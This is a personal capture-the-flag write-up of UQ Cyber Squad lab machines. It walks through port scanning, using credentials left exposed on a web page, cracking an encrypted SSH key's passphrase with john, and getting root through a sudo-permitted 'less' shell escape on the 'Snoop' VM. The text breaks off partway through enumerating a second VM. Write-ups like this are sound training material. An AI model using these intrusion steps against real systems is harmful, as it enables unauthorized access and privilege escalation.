Introduction

Found the UQ Cyber Squad site at https://cybersquad.uqcloud.net/index.html. Signed up for their CTF on https://ctf.uqcloud.net/

0x01 Introduction to Linux

This was identical to the QUT Whitehats Week 2 for challenges 1 through to 8. The writeup was already done at https://kush.com.fj/blog/posts/2020-02-28_qut_wh_wk2/.

No place like index.html - 10pts

There’s no clues or hints for this but it was pretty obvious.

• Navigated to https://cybersquad.uqcloud.net/index.html
• Manually reviewed the page source and searched for flag
• Found flag on line #30 of the source
• Submitted: flag{w0ah_n1c3_f1nd}

Machines

The machines challenges were named machines because they provided virtual machines for a traditional boot-to-root.

Snoop [USER] - 50pts

Using the knowledge you’ve gained from our meetups (and some of your own research), your task is to collect the user flag, then escalate to root and collect the system’s flag.

Format: flag{user}

Download link: https://cybersquad.uqcloud.net/machines/Snoop.ova

• Downloaded the ova file
• Setup DHCP on internat network named intnet to allow DHCP leases
• "c:\Program Files\Oracle\VirtualBox\VBoxManage.exe" dhcpserver add --netname intnet --ip 172.16.254.254 --netmask 255.255.255.0 --lowerip 172.16.254.100 --upperip 172.16.254.199 --enable
• Imported the ova and changed the networking to connect to the intnet Internal Network
• Connected one interface of my ParrotOS Sec VM to the Internal Network as well
• Booted up both VMs
• Performed a sudo netdiscover -i eth1 -r 172.16.254.0/24 to identify the target, found the DHCP server at 172.16.254.254 and the target at 172.16.254.104
• Ran a port scan using nmap to identify open ports nmap -n -v -A -p- 172.16.254.104

PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD
| http-robots.txt: 2 disallowed entries 
|_/rabbits/ /creds4snoopsite/ 
|_http-server-header: nginx/1.14.2
|_http-title: SNOOP DOGG's personal shop
8297/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1a:db:6e:32:42:9a:59:8c:7c:be:19:68:10:b8:cd:6e (RSA)
|   256 63:65:ff:75:dd:98:86:73:b7:4c:bf:9a:44:05:12:9e (ECDSA)
|_  256 43:88:ee:96:5d:50:8e:cf:20:b6:13:b9:e4:85:be:15 (ED25519)
9830/tcp open  http    nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

• Navigated to http://172.16.254.104/rabbits/ and received a HTTP 403 response. Likely there is some authentication required for this page if not forbidden for some other reason (Refer https://tools.ietf.org/html/rfc7231#section-6.5.3)
• Navigated to http://172.16.254.104/credsforsnoopsite/ and found a username and password

curl -v http://172.16.254.104/creds4snoopsite/
*   Trying 172.16.254.104:80...
* TCP_NODELAY set
* Connected to 172.16.254.104 (172.16.254.104) port 80 (#0)
> GET /creds4snoopsite/ HTTP/1.1
> Host: 172.16.254.104
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.14.2
< Date: Fri, 20 Mar 2020 23:03:27 GMT
< Content-Type: text/html
< Content-Length: 145
< Last-Modified: Fri, 13 Mar 2020 16:10:04 GMT
< Connection: keep-alive
< ETag: "5e6bb05c-91"
< Accept-Ranges: bytes
< 
Snoop's manager keeps forgetting his passwords - gotta put them somewhere he'll remember...<br><br>

user: richard<br>
password: igottupacmybags
* Connection #0 to host 172.16.254.104 left intact

• Attempted to authenticate using the credentials to the /rabbits/ site
  • curl -v –user richard:igottupacmybags http://172.16.254.104/rabbits/
  • curl -v –digest –user richard:igottupacmybags http://172.16.254.104/rabbits/
  • curl -v –anyauth –user richard:igottupacmybags http://172.16.254.104/rabbits/
• Eventually gave up and remembered that there is another site listening in port 9830 which also returned a 401 (Refer: https://tools.ietf.org/html/rfc7235#section-3.1) which is a more likely candidate for authentication
• Attempted to authenticate to the site on port 9830 and had success

curl -v --user richard:igottupacmybags http://172.16.254.104:9830
*   Trying 172.16.254.104:9830...
* TCP_NODELAY set
* Connected to 172.16.254.104 (172.16.254.104) port 9830 (#0)
* Server auth using Basic with user 'richard'
> GET / HTTP/1.1
> Host: 172.16.254.104:9830
> Authorization: Basic cmljaGFyZDppZ290dHVwYWNteWJhZ3M=
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.14.2
< Date: Fri, 20 Mar 2020 23:19:16 GMT
< Content-Type: text/html
< Content-Length: 4651
< Last-Modified: Sun, 15 Mar 2020 15:28:01 GMT
< Connection: keep-alive
< ETag: "5e6e4981-122b"
< Accept-Ranges: bytes
< 
Hello there<br><br>

Here's that thing we talked about richard... If snoop finds out he'll toast me, and not in the way he normally toasts things<br><br>


LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRF
Sy1JbmZvOiBBRVMtMjU2LUNCQyxGMTgyMDQ0NjE3Q0UzNTIwNjAyNTM4ODVCMEUwRDRERgoKUFFr
RmRXU0tLODh5TUtudXVVQmIrYnEvYlQ2dFg5SitlaEhQQUdxTUl3MlFLVGZvKzFYc0E2SmF0TDRu
Y1IzVgphemhxVTZYR3FFdVNHWEc1UHdBdUVCZnAza29TdUNzcDdiRGVEc0xjbHhxZjg2RlR1NTRU
VDhJdFRoUHBlMHhmCkhRNnBob3o0QkYwUEZpZ3I2b2prQXZjREtZSXBFT21YZm9SdkNzMk1aRGxG
RGpLZVBDWXhRcEw4aTZiVkQ0M2kKY1Y4SGFEMVh4QlJaZDZGTE8xVVIrWDBIQTBQWFJjcjlqbjA5
SHR4ay9BV1B2R284NlNra3NqWXJCOEZSSEQrcwpJSWpSZlhXUjVxaUwrVVdIaHZib2N0SSsxaWFy
WG1iNTk4NWQ0dHltZWRCU1JReGFONU5aeUczNzN6NU45eUJwClgwa0haT01PeTM4c0JZU2VzQ0hV
ZGN0UTZhNVI3Q2FOWGNwcEF2NmVNZ3dNRHNZbDN6K294Zm9hRlFRcnZzN2gKVjlXVHJPeC80V0Zl
MUh0M3ZKQmhwQnd5dEFjVlB2L0RuMmdyT0dxNHh5Q2JxaUlQNHJvNG5tN2FiQnBCZnFFYgppcUFN
Q0VZK2hXa1RmajBYME5zSXZtRk0yQlh1WlUyT1QrQ0N4bGZLYlNyZEpSWWpUVkhRaFdEbUgwNGxY
RGx3CktuTnkwei95cGtGbHA2MUJHSlduMDZsRjgreXBvaGp4bms4ejd1NWUxQURMUm1ybUhBMGdF
L1kyS21wcjBsc2cKbmJaRTN0c09paE03M2RjdHo5ZFoxc29jTGk3UzRoTFZKTEdVbC9nMGFuQjJq
YTZ5V3JCdnREaTZKZVNxcVBDaQo2eFNVODNjRzlPK0RVMFNvNGNjSDdYZ25zeTc2Yk5mcy8xYlls
QlI3dXNrQnpSTDRHRjV5MHNjSEZ5bnYrSkVTCitLa2RRL051NHVRdFVIWVNXMlVGekpibkNoRGg5
UHJnbGRQSzJITDliME1hQndUOXN6MngyNk1tYnV6Y1dVTFEKcVJjeWRGb2FNV1V5NENJcDIxMkhs
RDdkSnllalg4djlNU1gyQ0s4VHF6eC9rNkE2c2NEMFFSU05PM0pIa25JUAp6eEptSHhUOS9FdzRs
SlZqaVFYTnFjMlh5TmFxckNXZlAxemVwakVoR2dzV3pROUpDTkMzTkVQUDFvMk1CTFN2Ck0zVk5X
aDNFTnFnWG5TNDlSMEV2clJJRlBSd291R2lQNDI0czczKzRqTXpCeW9qd0NLcmxkRXFXTS9WT1NM
bysKTXg5ZWx3KzF2MlQ2UllMSzZLNkNKSUc3TW5kaVpNZDIxQ3c2S3pCNTRyTTdWWnk3LytIMXdY
blFpQTZpTEwvbAp0bFdQdm9aMG5XYUVEVVY1cXpDUzlTSzJkSjZNcVBhR1hJcGFnSmJrQmE1bWFU
ajN3ZVBWUW8zaHh0R1Vzck1JClV6V1ZUNkkxNFZLSjdWKzFSM1NNUjlrVXBYS3NMQnFsdVh4VHd5
NS9ZVWQydU1PRWc3cDRFRXBia095cDF6S2sKNk1ZS1A5YW1oVnZHVEdCRkZPZ2hTSCt6MkpLc0E3
bTR4bTgyZGl4dUJkTjYxVTJjRFM5V2t5SzVEZ0lyUUY3MApCK3llNmZoakx1Mk82YnJJY1BZYzJN
b1dUZG1nUzllWmNxb1NRc3dJOTl2YkFoMlR3QUltN3BqMUR3RTFHdjVpCi9OTERvVGpKQ0EzeFc2
MnFRNE5EckQyTjN6ekY5ZWN0VGxqdlcrKzJ5TEEwNWh1YUs1bUtINmdEd1NRcUZDNjkKUDNQait3
RkZBNWFPUzlvRU5RdjZwTFMwZnpOendudEVmR0lUeW5iMU85WDZBNkNmcHlyMTJSOFRqRHB6Sllz
SQpKZExLK0JrR0UxV3FyaUlYSUZ1QWdtRlhxcE1wbXJiR3lMMmtYY2p6Yk9RZFovQVI2L2RlRTZX
ZFFEOEpkZkl4CmVzNWJDaVMvRUwvZGRxRGRLd0pENWMxckxTSmdnMjhFZHdnZkQ5a1VqUWY2Y0Vx
U1psRjUvNHkvbDNhRTFVc20KNVUyVkh6aTZMOHRvWjVXTnlkaXlhcDhydlF0SkxmZ3l4cStZSjNS
KzJHU0hVcVVBMFM3WlBNbjNEMTMrK1RISApTK3ZpT3dSOFJ1Z3Y2VVF6VDBzZ2NZemZ3VFJJZm5V
Z285R0F6T1J1aHVLcDREa3NzVWFrdHNlTU4wZ3ZTdWVKCkx0MkM4bXVaWVRyMG8rWEVJODFFcExh
c3BkOWJEMzZWbnRkbTRHdEtzNTBudm5XMVlpOE0rQWpDSWV0TGNTQlQKN0huQ0o4OVZMUE03Q3RZ
cmdIa05QZlI4cEJrTC9iUnMycmFhZHlZSU5zT1Y3M2l1eXlvbnRRVCtIVWN6N1orcQpXTFZTa3hn
NWNqdzhGT1JvWXlxRFoyOWRFUGp0bkJCWHhMaFIzQzhONklNMHlUNDE3b29mUzRRVjVQRVI2YUFr
CnhuMEh5d0dxWGJUNjArdVdSZnZQQVA5blNOb292NDlKbityR3lFZkJXbnJRc1h1TnFKSW1Db3Qy
dUpzRG9MQXAKYXhGNmNERHBoVEhkLzhPMkJJZ09yZzRKSHp2WFRUNC91RC94RTJvRW12UUllazBC
Sm9Wa2hOU3dOSmtXNitsKwpYV2cvd01DU2dFdDFCRkd6Q2x6SUxEbGJiTjR2cEczcUVjL2ZPS3J6
d0srOGVIeDFOVGxad3pqandVczBDVEJyCkZSMzNLSm5lS1d5cDlRWkRMMk1JVmNYdzZyQ09GS0xn
bHV6NzY1ODdqL01qa3FYSm5BeDVnbnlneUdDczR4amMKb00xZkNCdTR5Q3RNUnVQVjdmUzg1WlRJ
QnBFd0FZZ0JXOE5hRURlUVFnUktMeVVGNlg2ZnNSRW1UQ0dqaktyMwphbjBDZ1dSWlZDVmZ0Sk5O
RCtTUXQrY1E3U2paVHFIVmI4UkdYUmlUMXROcGwzYnRmZG5yNGNpamFJa1lFL1BOCld4aktWc2Iy
dHcvOEQ3Wi9VaHpSUjN6T2RTa01JeXNiUmpIODBGMDJsSitxSVNSeDFxNWMvRnMyaVVTdENkTWsK
ZmNML3crRHMwNnhlMG1kSWt6QUdtNmo1cUdqYmFLTElUejloU3d1cE11aXFmUHlSc2EvYXoySGtP
UWowZDdKNwozWW54RFhvRmVXQlVSekZTelhESW9NY2RRTWtPaVV0ZVIyVmRIS0tvWXNiNnJUN3lZ
YlBGQ1VSdW9rQjJDTUFtCmlyV2ZnbnUybkZGRjdyMGl0NVhhZVBhTmg3c2hXL3FVTUJnTWdVaWty
VVRBVElCU2ZiR1JONk04RG5Yc3pOTHEKMk9CeG1aWlB4Yi93SlBIUkhsZkNhU0x6Sm1IU29aeFUv
Yi9OdlZZMHdCSkR5T0FaZHpMTlkzMGR6TnZVSFN2cQpjaEdTTHRIR0Y3WnMzY2lxZ3BlbzdnUzBQ
OGFqdWpPWTNza3VoeFpEM3NLcnlCZlhMZ21Nakx0K0RiMnhlNlFhCmpSWndTdkhvM1lJVGJJdlp1
Q3RtbkJaU0FQSWgxR2kzSGtsWU9yUE9uWUFRRkNack9KRnQ2bUpHMEtLNnY4dnEKU2FqY1dEZmpm
TUdRRncybms4cnJmM09BNjlDYlJVSFBnYklsODJZem9GM1VtUzZ6UDZmNU9Dam8vd3dtaFdnZQpm
YS82UlFtNm50cVRFYTdRY0EreHBDQ3JxSVBxZUt5WEpwM0ZZY2NKRXgwUEpvZS93bEdKQXZJbnZE
cWpwWjhSCmRaaUUwaGJCNkNtSWlPaGdmNWExUStlbnhaL25GdTJ0MjlqNHlJOTlsOVZabXgrNVVi
RUpidjcya0lrcjN0UEYKTm9KMDZ5ZUVWdEN5T3FpOU1sL1dhUU9mYStyOVJhc2cvS1NGdlJRZjlJ
NUtZYWZ6UXFYdXBOSkxKTnJVRFBuMQpldWxsTXd4bGtNdk5Mc1FqVjVGa0lBWm1XcDZUOTU1MUJY
ekFycDhSV1pWeHB1RTRXVDRuWTlqWnpQYVBXRjI5CnBNcDhOYWlRZXNoY0tHVDZ0TXc3VHYyNWpO
Ri9KMURkUmlEcHkzMXk1bXVvRXYrQi9QRUYyNi9obHZNcEwrMVkKekQ2eVFkQXp0NjY0bnB4NVFI
YVpKS3RXSm50SFQ1UURIZFQ0MTlnRHR0TytLOHV5Q3laNXg0MDZ1WHcwcURyVQotLS0tLUVORCBS
U0EgUFJJVkFURSBLRVktLS0tLQo=

• Placed the Base64 encoded string in a file `9830-base64.txt
• Decoded the Base64 encoded string and found an RSA private key

base64 -d < 9830-base64.txt 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-256-CBC,F182044617CE352060253885B0E0D4DF

PQkFdWSKK88yMKnuuUBb+bq/bT6tX9J+ehHPAGqMIw2QKTfo+1XsA6JatL4ncR3V
azhqU6XGqEuSGXG5PwAuEBfp3koSuCsp7bDeDsLclxqf86FTu54TT8ItThPpe0xf
HQ6phoz4BF0PFigr6ojkAvcDKYIpEOmXfoRvCs2MZDlFDjKePCYxQpL8i6bVD43i
cV8HaD1XxBRZd6FLO1UR+X0HA0PXRcr9jn09Htxk/AWPvGo86SkksjYrB8FRHD+s
IIjRfXWR5qiL+UWHhvboctI+1iarXmb5985d4tymedBSRQxaN5NZyG373z5N9yBp
X0kHZOMOy38sBYSesCHUdctQ6a5R7CaNXcppAv6eMgwMDsYl3z+oxfoaFQQrvs7h
V9WTrOx/4WFe1Ht3vJBhpBwytAcVPv/Dn2grOGq4xyCbqiIP4ro4nm7abBpBfqEb
iqAMCEY+hWkTfj0X0NsIvmFM2BXuZU2OT+CCxlfKbSrdJRYjTVHQhWDmH04lXDlw
KnNy0z/ypkFlp61BGJWn06lF8+ypohjxnk8z7u5e1ADLRmrmHA0gE/Y2Kmpr0lsg
nbZE3tsOihM73dctz9dZ1socLi7S4hLVJLGUl/g0anB2ja6yWrBvtDi6JeSqqPCi
6xSU83cG9O+DU0So4ccH7Xgnsy76bNfs/1bYlBR7uskBzRL4GF5y0scHFynv+JES
+KkdQ/Nu4uQtUHYSW2UFzJbnChDh9PrgldPK2HL9b0MaBwT9sz2x26MmbuzcWULQ
qRcydFoaMWUy4CIp212HlD7dJyejX8v9MSX2CK8Tqzx/k6A6scD0QRSNO3JHknIP
zxJmHxT9/Ew4lJVjiQXNqc2XyNaqrCWfP1zepjEhGgsWzQ9JCNC3NEPP1o2MBLSv
M3VNWh3ENqgXnS49R0EvrRIFPRwouGiP424s73+4jMzByojwCKrldEqWM/VOSLo+
Mx9elw+1v2T6RYLK6K6CJIG7MndiZMd21Cw6KzB54rM7VZy7/+H1wXnQiA6iLL/l
tlWPvoZ0nWaEDUV5qzCS9SK2dJ6MqPaGXIpagJbkBa5maTj3wePVQo3hxtGUsrMI
UzWVT6I14VKJ7V+1R3SMR9kUpXKsLBqluXxTwy5/YUd2uMOEg7p4EEpbkOyp1zKk
6MYKP9amhVvGTGBFFOghSH+z2JKsA7m4xm82dixuBdN61U2cDS9WkyK5DgIrQF70
B+ye6fhjLu2O6brIcPYc2MoWTdmgS9eZcqoSQswI99vbAh2TwAIm7pj1DwE1Gv5i
/NLDoTjJCA3xW62qQ4NDrD2N3zzF9ectTljvW++2yLA05huaK5mKH6gDwSQqFC69
P3Pj+wFFA5aOS9oENQv6pLS0fzNzwntEfGITynb1O9X6A6Cfpyr12R8TjDpzJYsI
JdLK+BkGE1WqriIXIFuAgmFXqpMpmrbGyL2kXcjzbOQdZ/AR6/deE6WdQD8JdfIx
es5bCiS/EL/ddqDdKwJD5c1rLSJgg28EdwgfD9kUjQf6cEqSZlF5/4y/l3aE1Usm
5U2VHzi6L8toZ5WNydiyap8rvQtJLfgyxq+YJ3R+2GSHUqUA0S7ZPMn3D13++THH
S+viOwR8Rugv6UQzT0sgcYzfwTRIfnUgo9GAzORuhuKp4DkssUaktseMN0gvSueJ
Lt2C8muZYTr0o+XEI81EpLaspd9bD36Vntdm4GtKs50nvnW1Yi8M+AjCIetLcSBT
7HnCJ89VLPM7CtYrgHkNPfR8pBkL/bRs2raadyYINsOV73iuyyontQT+HUcz7Z+q
WLVSkxg5cjw8FORoYyqDZ29dEPjtnBBXxLhR3C8N6IM0yT417oofS4QV5PER6aAk
xn0HywGqXbT60+uWRfvPAP9nSNoov49Jn+rGyEfBWnrQsXuNqJImCot2uJsDoLAp
axF6cDDphTHd/8O2BIgOrg4JHzvXTT4/uD/xE2oEmvQIek0BJoVkhNSwNJkW6+l+
XWg/wMCSgEt1BFGzClzILDlbbN4vpG3qEc/fOKrzwK+8eHx1NTlZwzjjwUs0CTBr
FR33KJneKWyp9QZDL2MIVcXw6rCOFKLgluz76587j/MjkqXJnAx5gnygyGCs4xjc
oM1fCBu4yCtMRuPV7fS85ZTIBpEwAYgBW8NaEDeQQgRKLyUF6X6fsREmTCGjjKr3
an0CgWRZVCVftJNND+SQt+cQ7SjZTqHVb8RGXRiT1tNpl3btfdnr4cijaIkYE/PN
WxjKVsb2tw/8D7Z/UhzRR3zOdSkMIysbRjH80F02lJ+qISRx1q5c/Fs2iUStCdMk
fcL/w+Ds06xe0mdIkzAGm6j5qGjbaKLITz9hSwupMuiqfPyRsa/az2HkOQj0d7J7
3YnxDXoFeWBURzFSzXDIoMcdQMkOiUteR2VdHKKoYsb6rT7yYbPFCURuokB2CMAm
irWfgnu2nFFF7r0it5XaePaNh7shW/qUMBgMgUikrUTATIBSfbGRN6M8DnXszNLq
2OBxmZZPxb/wJPHRHlfCaSLzJmHSoZxU/b/NvVY0wBJDyOAZdzLNY30dzNvUHSvq
chGSLtHGF7Zs3ciqgpeo7gS0P8ajujOY3skuhxZD3sKryBfXLgmMjLt+Db2xe6Qa
jRZwSvHo3YITbIvZuCtmnBZSAPIh1Gi3HklYOrPOnYAQFCZrOJFt6mJG0KK6v8vq
SajcWDfjfMGQFw2nk8rrf3OA69CbRUHPgbIl82YzoF3UmS6zP6f5OCjo/wwmhWge
fa/6RQm6ntqTEa7QcA+xpCCrqIPqeKyXJp3FYccJEx0PJoe/wlGJAvInvDqjpZ8R
dZiE0hbB6CmIiOhgf5a1Q+enxZ/nFu2t29j4yI99l9VZmx+5UbEJbv72kIkr3tPF
NoJ06yeEVtCyOqi9Ml/WaQOfa+r9Rasg/KSFvRQf9I5KYafzQqXupNJLJNrUDPn1
eullMwxlkMvNLsQjV5FkIAZmWp6T9551BXzArp8RWZVxpuE4WT4nY9jZzPaPWF29
pMp8NaiQeshcKGT6tMw7Tv25jNF/J1DdRiDpy31y5muoEv+B/PEF26/hlvMpL+1Y
zD6yQdAzt664npx5QHaZJKtWJntHT5QDHdT419gDttO+K8uyCyZ5x406uXw0qDrU
-----END RSA PRIVATE KEY-----

• Repeated the process and redirected the output into a files called ssh-key
• The start of the RSA key indicates that its encrypted using a passphrase, so we need the passphrase before we are able to use the SSH key

head -4 ssh-key.pri 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-256-CBC,F182044617CE352060253885B0E0D4DF

• Get the base64 decoded key hash, encryption type, salt value, etc from the encrypted SSH key /usr/share/john/ssh2john.py ssh-key > ssh-key.hash
• Attempt to find a passphrase for the SSH key

/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt ssh-key.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
crip4life        (ssh-key.pri)
1g 0:00:00:36 DONE (2020-03-20 19:34) 0.02740g/s 393030p/s 393030c/s 393030C/sa6_123..*7�Vamos!
Session completed

• We find that the passphrase is crip4life
• We can attempt to use the SSH to connect to the server on the port 8297 and grab the user flag

ssh -i ssh-key [email protected] -p 8297
The authenticity of host '[172.16.254.104]:8297 ([172.16.254.104]:8297)' can't be established.
ECDSA key fingerprint is SHA256:ppY8Sx1xhBzSPYfbF5i91Aa1Hy5xiBaYT6iCzbuEbkM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[172.16.254.104]:8297' (ECDSA) to the list of known hosts.
Enter passphrase for key 'ssh-key': 
Linux snoop 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 15 13:02:01 2020 from 192.168.1.112
richard@snoop:~$ uname -a
Linux snoop 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
richard@snoop:~$ hostname
snoop
richard@snoop:~$ id
uid=1000(richard) gid=1000(richard) groups=1000(richard),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
richard@snoop:~$ ls -las
total 44
4 drwxr-xr-x 3 richard richard 4096 Mar 14 10:36 .
4 drwxr-xr-x 3 root    root    4096 Mar 14 00:09 ..
4 -rw------- 1 richard richard  803 Mar 16 01:27 .bash_history
4 -rw-r--r-- 1 richard richard  220 Mar 14 00:09 .bash_logout
4 -rw-r--r-- 1 richard richard 3526 Mar 14 00:09 .bashrc
4 -rw------- 1 root    richard   38 Mar 14 02:03 .lesshst
4 -rwxr-xr-x 1 richard richard  208 Mar 14 02:06 list_clients.sh
4 -rw-r--r-- 1 richard richard  807 Mar 14 00:09 .profile
4 drwxr-xr-x 2 richard richard 4096 Mar 16 01:27 .ssh
4 -rw-r--r-- 1 root    root      28 Mar 14 10:36 user.txt
4 -rw------- 1 richard richard 3730 Mar 14 02:06 .viminfo
richard@snoop:~$ cat user.txt 
flag{v3ry_s3cur3_4s51st4nt}

• Submitted: flag{v3ry_s3cur3_4s51st4nt}

Snoop [ROOT] - 60pts

Now own the machine!

Format: flag{root}

Download link: https://cybersquad.uqcloud.net/machines/Snoop.ova

• Whilst logged in as richard we enumerate the files in his home diectory
• We find list_clients.sh

cat list_clients.sh 
#!/bin/bash

echo "This script prints out a list of snoop's 'clients'"
echo "It is sensitive information - only for your eyes"
echo "List of clients:"
/usr/bin/sudo /usr/bin/less /root/clients | /usr/bin/cat

• Although the account richard is able to run commands as sudo, we do not have his password, and his sudo privileges may be restricted to running a single command
• From past experience we know that we can run commands using less, so we manually run the sudo command and execute shell commands in less using !after we escape in less

/usr/bin/sudo /usr/bin/less /root/clients
1. Two packs
2. 60 Cents
3. mnms
4. hot square
5. The passive S.M.A.L.L
6. Nas-server
!bash
root@snoop:/home/richard# id
uid=0(root) gid=0(root) groups=0(root)
root@snoop:/home/richard# pwd
/home/richard
root@snoop:/home/richard# cd /root
root@snoop:~# ls -las
total 44
4 drwx------  3 root root 4096 Mar 16 01:28 .
4 drwxr-xr-x 18 root root 4096 Mar 14 00:07 ..
8 -rw-------  1 root root 4275 Mar 14 08:42 .bash_history
4 -rw-r--r--  1 root root  596 Mar 14 00:49 .bashrc
4 -rw-r--r--  1 root root   86 Mar 14 09:06 clients
4 -rw-r--r--  1 root root   27 Mar 14 10:35 flag.txt
4 -rw-------  1 root root   52 Mar 14 02:06 .lesshst
4 drwxr-xr-x  3 root root 4096 Mar 14 01:59 .local
4 -rw-r--r--  1 root root  148 Aug 18  2015 .profile
0 -rw-------  1 root root    0 Mar 16 01:28 .viminfo
4 -rw-r--r--  1 root root  176 Mar 14 09:42 .wget-hsts
root@snoop:~# cat flag.txt 
flag{sn0op_l0v3s_ku5hi0ns}

• Submitted: flag{sn0op_l0v3s_ku5hi0ns}

Inclusiveness - 100pts

Download the box from http://deadbeef-uq.ddns.net/Inclusiveness.ova

Become a user and then root the machine to find the flag!

• Downloaded the ova file
• Imported into Virtualbox
• Connected to Internal Network intnet and booted up
• Discovered target using netdiscover at 172.16.254.103
• Performed nmap port scan nmap -n -v -A -p- 172.16.254.103

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 20:10 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Initiating Ping Scan at 20:10
Scanning 172.16.254.103 [2 ports]
Completed Ping Scan at 20:10, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 20:10
Scanning 172.16.254.103 [65535 ports]
Discovered open port 80/tcp on 172.16.254.103
Discovered open port 22/tcp on 172.16.254.103
Discovered open port 21/tcp on 172.16.254.103
Completed Connect Scan at 20:11, 18.51s elapsed (65535 total ports)
Initiating Service scan at 20:11
Scanning 3 services on 172.16.254.103
Completed Service scan at 20:11, 6.19s elapsed (3 services on 1 host)
NSE: Script scanning 172.16.254.103.
Initiating NSE at 20:11
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 20:11, 1.19s elapsed
Initiating NSE at 20:11
Completed NSE at 20:11, 0.04s elapsed
Initiating NSE at 20:11
Completed NSE at 20:11, 0.01s elapsed
Nmap scan report for 172.16.254.103
Host is up (0.0017s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Feb 08 21:51 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:172.16.254.100
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
|   256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_  256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.36 seconds

• Found three open ports 21 (FTP), 22 (SSH) and 80 (HTTP)
• Could not find any known exploits against the services using searchsploit
• The web site appears to be using the default Apache site on a Debian host, decided to try and enumerate directories using gobuster gobuster dir -u http://172.16.254.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 2>&1 > gobuster.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://172.16.254.103
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/20 22:08:50 Starting gobuster
===============================================================
/manual (Status: 301)
/javascript (Status: 301)
/robots-txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/03/20 22:10:41 Finished
===============================================================

• Attempted to get the robots-txt file even though this does not seem to be the standard robots.txt file

curl -v http://172.16.254.103/robots-txt
*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /robots-txt HTTP/1.1
> Host: 172.16.254.103
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 02:24:04 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: User-Agent
< Last-Modified: Sat, 08 Feb 2020 03:40:29 GMT
< ETag: "3b-59e084481655e"
< Accept-Ranges: bytes
< Content-Length: 59
< Content-Type: text/html
< 
